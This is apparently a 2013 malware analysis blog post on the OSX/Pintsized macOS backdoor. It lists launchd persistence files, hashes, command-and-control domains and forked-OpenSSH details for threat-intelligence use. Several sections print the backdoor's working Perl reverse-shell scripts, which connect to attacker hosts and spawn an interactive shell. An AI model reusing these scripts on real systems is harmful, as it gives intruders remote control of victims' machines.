# OSX/Pintsized Backdoor Additional Details **[eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/](https://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/)** wow 24/03/2013 In complement to my blog post regarding, you will find here under some additional informations regarding OSX/Pintsized, the backdoor used to in these attacks. [OSX/Pintsized backdoor was initially described by Intego, the 19 February, with some](https://www.intego.com/mac-security-blog/pint-sized-backdoor-for-os-x-discovered/) details. At the time of Intego post, all of the C&C components were sinkholed to **[Shadowserver. The backdoor was composed of clear text reverse shell perl scripts,](https://shadowserver.org/wiki/)** executed a regular interval, and by a forked version of OpenSSH named “cupsd“. A RSA key was embedded in the forked OpenSSH, reported domain name of C&C was “corp-aapl.com” and reported file names were: com.apple.cocoa.plist cupsd (Mach-O binary) com.apple.cupsd.plist com.apple.cups.plist com.apple.env.plist **[F-Secure also reported, the 19 February, some additional C&C servers “cloudbox-](http://www.f-secure.com/weblog/archives/00002505.html)** _storage.com” and “digitalinsight-ltd.com“._ **[Symantec reported some additional details on the](https://www.symantec.com/security_response/writeup.jsp?docid=2013-022017-1613-99&tabid=2)** C&C domain names “cache.cloudbox-storage.com“, “img.digitalinsight-ltd.com” and “pop.digitalinsight-ltd.com“, and also reported the storage location of the forked version of OpenSSH “/Users/[USER NAME]/.cups/cupsd“. By doing an analysis of OSX/Pintsized I can provide the following additional informations: [All files, targeting OSX, were controlled by launchd daemon through launchd.plist](https://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man8/launchd.8.html) configuration files. Here under the list of all known launchd configuration files. [7fe4149b82516ae43938de6b8316ed84](https://www.virustotal.com/en/file/3b829abe42252b2fa8d304b93a35090c23f3702ad048adfdd03942f77e0f5a66/analysis/) **First seen: 2013-02-19 / Label: com.apple.cupsd / RunAtLoad: true / StartInterval: 900 /** **C&C: corp-aapl.com:8443** Execute “/Users/[USER NAME]/.cups/cupsd -z corp-aapl.com -P 8443” **[2e35b9a683ccc2408fef5ca575abf0e6](https://www.virustotal.com/en/file/62cac21ff3d2745a4b83770950b07b959d11fb4c4828eac14680c001824a1a68/analysis/)** **First seen: 2013-02-19 / Label: com.apple.cupsd / RunAtLoad: true** / StartInterval: 900 / C&C: corp-aapl.com:8443 Execute “/Users/[USER NAME]/.cups/cupsd -z corp-aapl.com -P 8443” **[27f241 64303 4 2d1d94d3143 48 b9](https://www.virustotal.com/en/file/7ba90281a833f046069a64c3805bd29d92276177c6fb41e6a8966cf0b4f07b96/analysis/)** ----- **First seen: 2013-02-19 / Label: com.apple.istore / RunAtLoad: true** / StartInterval: 900 / C&C: cache.cloudbox-storage.com:443 Execute the following script with /usr/bin/perl ``` use Socket; $p=sockaddr_in(443,inet_aton("cache.cloudbox-storage.com")); socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); connect(S,$p); open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); ``` [2b9b84f0612d6f9d7efb705dd7522f83](https://www.virustotal.com/en/file/837de378c6b95156a53f5536c0d982d247335a22e6bf5f146a6c3f4c84bc55bd/analysis/) **First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true** / StartInterval: 900 / C&C: cache.cloudbox-storage.com:443 Execute the following script with /usr/bin/perl ``` use Socket; $p=sockaddr_in(443,inet_aton("cache.cloudbox-storage.com")); socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); connect(S,$p); open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); ``` [34cee92669e0c60a9dbafae7319f49db](https://www.virustotal.com/en/file/490d6a45bd7e5ee265373f46fd00e98ff2eb854c0ceda024aa3adaefd947202f/analysis/) **First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true** / StartInterval: 900 / C&C: img.digitalinsight-ltd.com:443 Execute the following script with /usr/bin/perl ``` use Socket; $p=sockaddr_in(443,inet_aton("img.digitalinsight-ltd.com")); socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); connect(S,$p); open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); ``` [d3f151b246deb74890c612606c6ad044](https://www.virustotal.com/en/file/e8b8e23c1991eefb06d1b1c7f96d5044d7ba8c93f76dad7329762ea00bc19898/analysis/) **First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true** / StartInterval: 900 / C&C: pop.digitalinsight-ltd.com:443 Execute the following script with /usr/bin/perl ----- ``` use Socket; $h="pop.digitalinsight-ltd.com "; $h=~s/\s+$//; $p=sockaddr_in(443,inet_aton($h)); socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); connect(S,$p); open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); ``` [f419dfb35a0d220c4c53c4a087c91d5e](https://www.virustotal.com/en/file/2869d87a9d9abf7fbe3613e4a2520151358f3dcbad3f308e522fbf207fd3eb4f/analysis/) **First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true** / StartInterval: 900 / C&C: pop.digitalinsight-ltd.com:443 Execute the following script with /usr/bin/perl ``` use Socket; $p=sockaddr_in(443,inet_aton("pop.digitalinsight-ltd.com")); socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); connect(S,$p); open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); ``` [59424d4a567ae809f96afc56d22892b2](https://www.virustotal.com/en/file/b4274c7496f27dade23e8515deb519417e34d684a15d4c29c36047825a8446e6/analysis/) **First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 999** / C&C: img.digitalinsight-ltd.com:443 Execute the following script with /usr/bin/perl ``` use Socket; $p=sockaddr_in(443,inet_aton("img.digitalinsight-ltd.com")); socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); connect(S,$p); open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); ``` Here under all binary files, aka “/Users/[USER NAME]/.cups/cupsd” or “/usr/sbin/muxd“. [0ec55685affc322a5d7be2e9ca1f9cbf](https://www.virustotal.com/en/file/8f5d8748a66e7b54aeaafc1b65b974db31fe8403c9d39b187fd54943c6d97d98/analysis/) **First seen: 2013-01-31 / CPU Architecture: 64 bit** Fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. [“PuffySSH_5.8p1” string. 2048 bit embedded private key with associated public key.](https://pastebin.com/ZtgrAfg5) ----- [3a861b8526e397b3684a99f363ec145b](https://www.virustotal.com/en/file/a610bb3396a2eb6186a135de5d0a5d29e16525fb7c069e853d0ce2bb90ca4921/analysis/) **First seen: 2013-02-20 / CPU Architecture: 64 bit** Fork of OpenSSH_6.0p1 with no logging, and “-P” and “-z” hidden command arguments. [“PuffySSH_5.8p1” string. 2048 bit embedded private key with associated public key.](https://pastebin.com/ZtgrAfg5) Here under an additional binary caught when Microsoft also pointed the fact that they were victim of this campaign. [1582d68144de2808b518934f0a02bfd6](https://www.virustotal.com/en/file/8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a/analysis/) **First seen: 2013-01-22 / Internal name: javacpl.exe** One additional file who was reported linked to the campaign: [622fc8b7daf425aed7f9ffa97e30c611](https://www.virustotal.com/en/file/09ae47e516d368ac1541f102e08b364f2e53c8fdfb5523a0cc6c1442969b6218/analysis/) **First seen: 2013-01-04 / Type: Java serialized data** [If you take a look at all the domain names sinkholed to Shadowserver, you will see](https://shadowserver.org/wiki/) additional domain names. ----- **Domain name: corp-appl.com – Creation Date: 05-mar-2012** **Domain name: cloudbox-storage.com – Creation Date: 07-dec-2012 – Sub-** **domains: cache.cloudbox-storage.com** **Domain name: digitalinsight-ltd.com – Creation Date: 22-mar-2012 – Sub-** **domains: ads.digitalinsight-ltd.com, img.digitalinsight-ltd.com, www.digitalinsight-ltd.com** and pop.digitalinsight-ltd.com **Domain name: clust12-akmai.net – Creation Date: 06-jun-2012 – Sub-domains:** fb.clust12-akmai.net and fbu.clust12-akmai.net ----- **Domain name: jdk-update.com – Creation Date: 31-oct-2012 – Sub-domains: ww1.jdk-** update.com and www.jdk-update.com **Domain name: fbcbn.net – Creation Date: 09-oct-2012 – Sub-domains: ak.fbcbn.net and** static.ak.fbcbn.net -----